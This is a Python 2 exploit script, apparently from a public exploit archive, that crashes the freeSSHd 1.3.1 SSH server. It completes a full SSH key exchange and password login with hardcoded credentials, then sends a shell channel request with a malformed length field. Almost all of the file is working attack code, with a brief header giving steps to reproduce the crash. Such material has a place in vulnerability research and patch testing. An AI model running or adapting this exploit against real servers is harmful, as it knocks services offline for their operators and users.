515 lines
No EOL
18 KiB
Python
Executable file
515 lines
No EOL
18 KiB
Python
Executable file
'''
|
|
# Exploit title: freesshd 1.3.1 denial of service vulnerability
|
|
# Date: 28-8-2015
|
|
# Vendor homepage: http://www.freesshd.com
|
|
# Software Link: http://www.freesshd.com/freeSSHd.exe
|
|
# Version: 1.3.1
|
|
# Author: 3unnym00n
|
|
|
|
# Details:
|
|
# ----------------------------------------------
|
|
# byte SSH_MSG_CHANNEL_REQUEST
|
|
# uint32 recipient channel
|
|
# string "shell"
|
|
# boolean want reply
|
|
|
|
# freeSSHd doesn't correctly handle channel shell request, when the "shell" length malformed can lead crashing
|
|
|
|
# Tested On: win7, xp
|
|
# operating steps:
|
|
1. in the freeSSHd settings: add a user, named "root", password is "fuckinA"
|
|
2. restart the server to let the configuration take effect
|
|
3. modify the hostname in this py.
|
|
4. running the py, u will see the server crash
|
|
|
|
|
|
# remark: u can also modify the user auth service request packet, to adjust different user, different password
|
|
|
|
|
|
'''
|
|
|
|
import socket
|
|
import struct
|
|
import os
|
|
from StringIO import StringIO
|
|
from hashlib import sha1
|
|
from Crypto.Cipher import Blowfish, AES, DES3, ARC4
|
|
from Crypto.Util import Counter
|
|
from hmac import HMAC
|
|
|
|
## suppose server accept our first dh kex: diffie-hellman-group14-sha1
|
|
P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF
|
|
G = 2
|
|
__sequence_number_out = 3
|
|
|
|
zero_byte = chr(0)
|
|
one_byte = chr(1)
|
|
four_byte = chr(4)
|
|
max_byte = chr(0xff)
|
|
cr_byte = chr(13)
|
|
linefeed_byte = chr(10)
|
|
crlf = cr_byte + linefeed_byte
|
|
|
|
class Message (object):
|
|
"""
|
|
An SSH2 message is a stream of bytes that encodes some combination of
|
|
strings, integers, bools, and infinite-precision integers (known in Python
|
|
as longs). This class builds or breaks down such a byte stream.
|
|
|
|
Normally you don't need to deal with anything this low-level, but it's
|
|
exposed for people implementing custom extensions, or features that
|
|
paramiko doesn't support yet.
|
|
"""
|
|
|
|
big_int = long(0xff000000)
|
|
|
|
def __init__(self, content=None):
|
|
"""
|
|
Create a new SSH2 message.
|
|
|
|
:param str content:
|
|
the byte stream to use as the message content (passed in only when
|
|
decomposing a message).
|
|
"""
|
|
if content is not None:
|
|
self.packet = StringIO(content)
|
|
else:
|
|
self.packet = StringIO()
|
|
|
|
def __str__(self):
|
|
"""
|
|
Return the byte stream content of this message, as a string/bytes obj.
|
|
"""
|
|
return self.asbytes()
|
|
|
|
def __repr__(self):
|
|
"""
|
|
Returns a string representation of this object, for debugging.
|
|
"""
|
|
return 'paramiko.Message(' + repr(self.packet.getvalue()) + ')'
|
|
|
|
def asbytes(self):
|
|
"""
|
|
Return the byte stream content of this Message, as bytes.
|
|
"""
|
|
return self.packet.getvalue()
|
|
|
|
|
|
def add_bytes(self, b):
|
|
"""
|
|
Write bytes to the stream, without any formatting.
|
|
|
|
:param str b: bytes to add
|
|
"""
|
|
self.packet.write(b)
|
|
return self
|
|
|
|
def add_byte(self, b):
|
|
"""
|
|
Write a single byte to the stream, without any formatting.
|
|
|
|
:param str b: byte to add
|
|
"""
|
|
self.packet.write(b)
|
|
return self
|
|
|
|
def add_boolean(self, b):
|
|
"""
|
|
Add a boolean value to the stream.
|
|
|
|
:param bool b: boolean value to add
|
|
"""
|
|
if b:
|
|
self.packet.write(one_byte)
|
|
else:
|
|
self.packet.write(zero_byte)
|
|
return self
|
|
|
|
def add_size(self, n):
|
|
"""
|
|
Add an integer to the stream.
|
|
|
|
:param int n: integer to add
|
|
"""
|
|
self.packet.write(struct.pack('>I', n))
|
|
return self
|
|
|
|
def add_int(self, n):
|
|
"""
|
|
Add an integer to the stream.
|
|
|
|
:param int n: integer to add
|
|
"""
|
|
if n >= Message.big_int:
|
|
self.packet.write(max_byte)
|
|
self.add_string(deflate_long(n))
|
|
else:
|
|
self.packet.write(struct.pack('>I', n))
|
|
return self
|
|
|
|
def add_int(self, n):
|
|
"""
|
|
Add an integer to the stream.
|
|
|
|
@param n: integer to add
|
|
@type n: int
|
|
"""
|
|
if n >= Message.big_int:
|
|
self.packet.write(max_byte)
|
|
self.add_string(deflate_long(n))
|
|
else:
|
|
self.packet.write(struct.pack('>I', n))
|
|
return self
|
|
|
|
def add_int64(self, n):
|
|
"""
|
|
Add a 64-bit int to the stream.
|
|
|
|
:param long n: long int to add
|
|
"""
|
|
self.packet.write(struct.pack('>Q', n))
|
|
return self
|
|
|
|
def add_mpint(self, z):
|
|
"""
|
|
Add a long int to the stream, encoded as an infinite-precision
|
|
integer. This method only works on positive numbers.
|
|
|
|
:param long z: long int to add
|
|
"""
|
|
self.add_string(deflate_long(z))
|
|
return self
|
|
|
|
def add_string(self, s):
|
|
"""
|
|
Add a string to the stream.
|
|
|
|
:param str s: string to add
|
|
"""
|
|
self.add_size(len(s))
|
|
self.packet.write(s)
|
|
return self
|
|
|
|
def add_list(self, l):
|
|
"""
|
|
Add a list of strings to the stream. They are encoded identically to
|
|
a single string of values separated by commas. (Yes, really, that's
|
|
how SSH2 does it.)
|
|
|
|
:param list l: list of strings to add
|
|
"""
|
|
self.add_string(','.join(l))
|
|
return self
|
|
|
|
def _add(self, i):
|
|
if type(i) is bool:
|
|
return self.add_boolean(i)
|
|
elif isinstance(i, int):
|
|
return self.add_int(i)
|
|
elif type(i) is list:
|
|
return self.add_list(i)
|
|
else:
|
|
return self.add_string(i)
|
|
|
|
def add(self, *seq):
|
|
"""
|
|
Add a sequence of items to the stream. The values are encoded based
|
|
on their type: str, int, bool, list, or long.
|
|
|
|
.. warning::
|
|
Longs are encoded non-deterministically. Don't use this method.
|
|
|
|
:param seq: the sequence of items
|
|
"""
|
|
for item in seq:
|
|
self._add(item)
|
|
|
|
|
|
def deflate_long(n, add_sign_padding=True):
|
|
"""turns a long-int into a normalized byte string (adapted from Crypto.Util.number)"""
|
|
# after much testing, this algorithm was deemed to be the fastest
|
|
s = bytes()
|
|
n = long(n)
|
|
while (n != 0) and (n != -1):
|
|
s = struct.pack('>I', n & long(0xffffffff)) + s
|
|
n >>= 32
|
|
# strip off leading zeros, FFs
|
|
for i in enumerate(s):
|
|
if (n == 0) and (i[1] != chr(0)):
|
|
break
|
|
if (n == -1) and (i[1] != chr(0xff)):
|
|
break
|
|
else:
|
|
# degenerate case, n was either 0 or -1
|
|
i = (0,)
|
|
if n == 0:
|
|
s = chr(0)
|
|
else:
|
|
s = chr(0xff)
|
|
s = s[i[0]:]
|
|
if add_sign_padding:
|
|
if (n == 0) and (ord(s[0]) >= 0x80):
|
|
s = chr(0) + s
|
|
if (n == -1) and (ord(s[0]) < 0x80):
|
|
s = chr(0xff) + s
|
|
return s
|
|
|
|
def inflate_long(s, always_positive=False):
|
|
"""turns a normalized byte string into a long-int (adapted from Crypto.Util.number)"""
|
|
out = long(0)
|
|
negative = 0
|
|
if not always_positive and (len(s) > 0) and (ord(s[0]) >= 0x80):
|
|
negative = 1
|
|
if len(s) % 4:
|
|
filler = chr(0)
|
|
if negative:
|
|
filler = chr(0xff)
|
|
# never convert this to ``s +=`` because this is a string, not a number
|
|
# noinspection PyAugmentAssignment
|
|
s = filler * (4 - len(s) % 4) + s
|
|
for i in range(0, len(s), 4):
|
|
out = (out << 32) + struct.unpack('>I', s[i:i+4])[0]
|
|
if negative:
|
|
out -= (long(1) << (8 * len(s)))
|
|
return out
|
|
|
|
def byte_mask(c, mask):
|
|
return chr(ord(c) & mask)
|
|
|
|
|
|
|
|
|
|
def _compute_key(K, H, session_id, id, nbytes):
|
|
"""id is 'A' - 'F' for the various keys used by ssh"""
|
|
m = Message()
|
|
m.add_mpint(K)
|
|
m.add_bytes(H)
|
|
m.add_byte(str(id))
|
|
m.add_bytes(session_id)
|
|
out = sofar = sha1(m.asbytes()).digest()
|
|
while len(out) < nbytes:
|
|
m = Message()
|
|
m.add_mpint(K)
|
|
m.add_bytes(H)
|
|
m.add_bytes(sofar)
|
|
digest = sha1(m.asbytes()).digest()
|
|
out += digest
|
|
sofar += digest
|
|
return out[:nbytes]
|
|
|
|
|
|
def compute_hmac(key, message, digest_class):
|
|
return HMAC(key, message, digest_class).digest()
|
|
|
|
|
|
def read_msg(sock, block_engine_in, block_size, mac_size):
|
|
header = sock.recv(block_size)
|
|
header = block_engine_in.decrypt(header)
|
|
packet_size = struct.unpack('>I', header[:4])[0]
|
|
leftover = header[4:]
|
|
buf = sock.recv(packet_size + mac_size - len(leftover))
|
|
packet = buf[:packet_size - len(leftover)]
|
|
post_packet = buf[packet_size - len(leftover):]
|
|
packet = block_engine_in.decrypt(packet)
|
|
packet = leftover + packet
|
|
|
|
def send_msg(sock, raw_data, block_engine_out, mac_engine_out, mac_key_out, mac_size):
|
|
global __sequence_number_out
|
|
out = block_engine_out.encrypt(raw_data)
|
|
|
|
payload = struct.pack('>I', __sequence_number_out) + raw_data
|
|
out += compute_hmac(mac_key_out, payload, mac_engine_out)[:mac_size]
|
|
sock.send(out)
|
|
__sequence_number_out += 1
|
|
|
|
def exploit(hostname, port):
|
|
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
sock.connect((hostname, port))
|
|
|
|
## send client banner
|
|
client_banner = 'SSH-2.0-SUCK\r\n'
|
|
sock.send(client_banner)
|
|
## recv server banner
|
|
server_banner = ''
|
|
while True:
|
|
data = sock.recv(1)
|
|
if data == '\x0a':
|
|
break
|
|
server_banner += data
|
|
|
|
print 'server banner is: ', server_banner.__repr__()
|
|
|
|
## do key exchange
|
|
## send client algorithms
|
|
cookie = os.urandom(16)
|
|
|
|
|
|
client_kex = '000001cc0514'.decode('hex') + cookie + '000000596469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000237373682d7273612c7373682d6473732c65636473612d736861322d6e69737470323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e65000000000000000000000000000000000000'.decode('hex')
|
|
sock.send(client_kex)
|
|
client_kex_init = client_kex[5:-5]
|
|
|
|
|
|
## recv server algorithms
|
|
server_kex = ''
|
|
str_pl = sock.recv(4)
|
|
pl = struct.unpack('>I', str_pl)[0]
|
|
tmp = sock.recv(pl)
|
|
padding_len = ord(tmp[0])
|
|
server_kex_init = tmp[1:-padding_len]
|
|
|
|
## do dh kex
|
|
## send client dh kex
|
|
x = 2718749950853797850634218108087830670950606437648125981418769990607126772940049948484122336910062802584089370382091267133574445173294378254000629897200925498341633999513190035450218329607097225733329543524028305346861620006860852918487068859161361831623421024322904154569598752827192453199975754781944810347
|
|
e = 24246061990311305114571813286712069338300342406114182522571307971719868860460945648993499340734221725910715550923992743644801884998515491806836377726946636968365751276828870539451268214005738703948104009998575652199698609897222885198283575698226413251759742449790092874540295563182579030702610986594679727200051817630511413715723789617829401744474112405554024371460263485543685109421717171156358397944976970310869333766947439381332202584288225313692797532554689171177447651177476425180162113468471927127194797168639270094144932251842745747512414228391665092351122762389774578913976053048427148163469934452204474329639
|
|
client_dh_kex = '0000010c051e0000010100c010d8c3ea108d1915c9961f86d932f3556b82cd09a7e1d24c88f7d98fc88b19ca3908cada3244dfc5534860b967019560ce5ee243007d41ecf68e9bfa7631847ecb1091558fd7ffe2f17171115690a6d10f3b62c317157ced9291770cc452cc93fb911f18de644ef988c09a3bff35770e99d1546d31c320993f8c12bb275cd2742afc547a0f3309c29a6e72611af965b6144b837ca2003c3ca1f3e35797ab143669b9034c575794c645383519d485a133e67d0793097ef08b72523fa3199c35358676d1fd9776248cae08e46da6414d0f975ffa4b4c84f69db86c47401808daa8a5919fc52ebed157b99e0dd2a4203f0c9e06d6395fa5c9b38a7ae8b159ea270000000000'.decode('hex')
|
|
sock.send(client_dh_kex)
|
|
|
|
## recv server dh kex
|
|
str_pl = sock.recv(4)
|
|
pl = struct.unpack('>I', str_pl)[0]
|
|
server_dh_kex = sock.recv(pl)
|
|
|
|
## send client newkeys
|
|
client_newkeys = '0000000c0a1500000000000000000000'.decode('hex')
|
|
sock.send(client_newkeys)
|
|
|
|
## recv server newkeys
|
|
str_pl = sock.recv(4)
|
|
pl = struct.unpack('>I', str_pl)[0]
|
|
server_new_keys = sock.recv(pl)
|
|
|
|
|
|
## calc all we need ...
|
|
host_key_len = struct.unpack('>I', server_dh_kex[2:6])[0]
|
|
# print host_key_len
|
|
host_key = server_dh_kex[6:6 + host_key_len]
|
|
|
|
f_len = struct.unpack('>I', server_dh_kex[6 + host_key_len:10 + host_key_len])[0]
|
|
str_f = server_dh_kex[10 + host_key_len:10 + host_key_len + f_len]
|
|
dh_server_f = inflate_long(str_f)
|
|
|
|
sig_len = struct.unpack('>I', server_dh_kex[10 + host_key_len + f_len:14 + host_key_len + f_len])[0]
|
|
sig = server_dh_kex[14 + host_key_len + f_len:14 + host_key_len + f_len + sig_len]
|
|
|
|
K = pow(dh_server_f, x, P)
|
|
## build up the hash H of (V_C || V_S || I_C || I_S || K_S || e || f || K), aka, session id
|
|
hm = Message()
|
|
|
|
hm.add(client_banner.rstrip(), server_banner.rstrip(),
|
|
client_kex_init, server_kex_init)
|
|
|
|
hm.add_string(host_key)
|
|
hm.add_mpint(e)
|
|
hm.add_mpint(dh_server_f)
|
|
hm.add_mpint(K)
|
|
|
|
H = sha1(hm.asbytes()).digest()
|
|
|
|
## suppose server accept our first cypher: aes128-ctr, hmac-sha1
|
|
block_size = 16
|
|
key_size = 16
|
|
mac_size = 20
|
|
|
|
IV_out = _compute_key(K, H, H, 'A', block_size)
|
|
key_out = _compute_key(K, H, H, 'C', key_size)
|
|
|
|
block_engine_out = AES.new(key_out, AES.MODE_CTR, IV_out, Counter.new(nbits=block_size * 8, initial_value=inflate_long(IV_out, True)))
|
|
mac_engine_out = sha1
|
|
mac_key_out = _compute_key(K, H, H, 'E', mac_engine_out().digest_size)
|
|
|
|
IV_in = _compute_key(K, H, H, 'B', block_size)
|
|
key_in = _compute_key(K, H, H, 'D', key_size)
|
|
block_engine_in = AES.new(key_in, AES.MODE_CTR, IV_in, Counter.new(nbits=block_size * 8, initial_value=inflate_long(IV_in, True)))
|
|
mac_engine_in = sha1
|
|
mac_key_in = _compute_key(K, H, H, 'F', mac_engine_in().digest_size)
|
|
|
|
## do user auth
|
|
## send client service request (user auth)
|
|
client_service_request = '\x00\x00\x00\x1C\x0A\x05\x00\x00\x00\x0C\x73\x73\x68\x2D\x75\x73\x65\x72\x61\x75\x74\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
|
|
## encrypt the packet
|
|
send_msg(sock, client_service_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
|
|
|
|
|
|
## recv server service accept
|
|
read_msg(sock, block_engine_in, block_size, mac_size)
|
|
|
|
## send client userauth request
|
|
client_userauth_request = '\x00\x00\x00\x3C\x08\x32'
|
|
## the user name length and username
|
|
client_userauth_request += '\x00\x00\x00\x04'
|
|
client_userauth_request += 'root'
|
|
|
|
## service
|
|
client_userauth_request += '\x00\x00\x00\x0E'
|
|
client_userauth_request += 'ssh-connection'
|
|
|
|
## password
|
|
client_userauth_request += '\x00\x00\x00\x08'
|
|
client_userauth_request += 'password'
|
|
client_userauth_request += '\x00'
|
|
|
|
## plaintext password fuckinA
|
|
client_userauth_request += '\x00\x00\x00\x07'
|
|
client_userauth_request += 'fuckinA'
|
|
|
|
## padding
|
|
client_userauth_request += '\x00'*8
|
|
|
|
## encrypt the packet
|
|
print 'send client_userauth_request'
|
|
send_msg(sock, client_userauth_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
|
|
# out = block_engine_out.encrypt(client_userauth_request)
|
|
# payload = struct.pack('>I', __sequence_number_out) + client_userauth_request
|
|
# out += compute_hmac(mac_key_out, payload, mac_engine_out)[:mac_size]
|
|
# sock.send(out)
|
|
|
|
|
|
## recv server userauth success
|
|
print 'recv server userauth success'
|
|
read_msg(sock, block_engine_in, block_size, mac_size)
|
|
|
|
|
|
## begin send malformed data
|
|
## send channel open
|
|
client_channel_open = '\x00\x00\x00\x2c\x13\x5a\x00\x00\x00\x07session\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x80\x00' + '\x00'*0x13
|
|
|
|
|
|
print 'send client_channel_open'
|
|
send_msg(sock, client_channel_open, block_engine_out, mac_engine_out, mac_key_out, mac_size)
|
|
|
|
## recv channel open success
|
|
# print 'recv channel open success'
|
|
read_msg(sock, block_engine_in, block_size, mac_size)
|
|
|
|
## send client channel request
|
|
client_channel_request = '\x00\x00\x00\x3c\x0d\x62\x00\x00\x00\x00\x00\x00\x00\x07pty-req\x01\x00\x00\x00\x05vt100\x00\x00\x00\x50\x00\x00\x00\x18' \
|
|
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + '\x00'*0x0d
|
|
|
|
|
|
print 'send client_channel_request'
|
|
send_msg(sock, client_channel_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
|
|
|
|
## recv server pty success
|
|
# print 'recv server pty success'
|
|
read_msg(sock, block_engine_in, block_size, mac_size)
|
|
|
|
|
|
## send client shell request
|
|
client_shell_request = '\x00\x00\x00\x1c\x0c\x62\x00\x00\x00\x00'
|
|
client_shell_request += '\x6a\x0b\xd8\xdashell' # malformed
|
|
client_shell_request += '\x01'
|
|
client_shell_request += '\x00'*0x0c
|
|
|
|
print 'send client_shell_request'
|
|
send_msg(sock, client_shell_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
|
|
# print 'recv server shell success'
|
|
# read_msg(sock, block_engine_in, block_size, mac_size)
|
|
|
|
|
|
|
|
if __name__ == '__main__':
|
|
|
|
hostname = '192.168.242.128'
|
|
port = 22
|
|
exploit(hostname, port) |